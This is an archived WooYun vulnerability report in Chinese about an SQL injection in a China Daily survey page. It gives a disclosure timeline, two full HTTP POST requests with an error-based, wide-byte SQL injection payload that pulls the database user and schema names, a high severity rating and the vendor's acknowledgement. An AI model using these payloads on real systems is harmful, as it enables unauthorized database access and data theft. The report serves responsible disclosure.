乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-15: 细节已通知厂商并且等待厂商处理中 2015-06-18: 厂商已经确认,细节仅向厂商公开 2015-06-28: 细节向核心白帽子及相关领域专家公开 2015-07-08: 细节向普通白帽子公开 2015-07-18: 细节向实习白帽子公开 2015-08-02: 细节向公众公开
POST /survey/doindex.php HTTP/1.1Content-Length: 333Content-Type: application/x-www-form-urlencodedReferer: http://app1.chinadaily.com.cn:80/survey/vs.php?id=105&tp=0Cookie: PHPSESSID=mchuv3t039vdtauv27j3lioal3Host: app1.chinadaily.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*act=DONE&poll_id=105&q_487=%bf%27||(select 1 from(select count(*),concat((select concat(0x5e5e5e,user(),0x5e5e5e) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&q_489=1908&q_490%5b%5d=1910&q_491=1914&q_493=1919&q_494=1921&sub=Submit&theVoteKey=acc8fb7460&type=c&view=Result
POST /survey/doindex.php HTTP/1.1Content-Length: 340Content-Type: application/x-www-form-urlencodedReferer: http://app1.chinadaily.com.cn:80/survey/vs.php?id=105&tp=0Cookie: PHPSESSID=mchuv3t039vdtauv27j3lioal3Host: app1.chinadaily.com.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*act=DONE&poll_id=105&q_487=%bf%27||(select 1 from(select count(*),concat((select concat(0x5e5e5e,schema_name,0x5e5e5e) from information_schema.SCHEMATA limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#&q_489=1908&q_490%5b%5d=1910&q_491=1914&q_493=1919&q_494=1921&sub=Submit&theVoteKey=acc8fb7460&type=c&view=Result
危害等级:高
漏洞Rank:20
确认时间:2015-06-18 14:48
十分感谢 努力修复中
暂无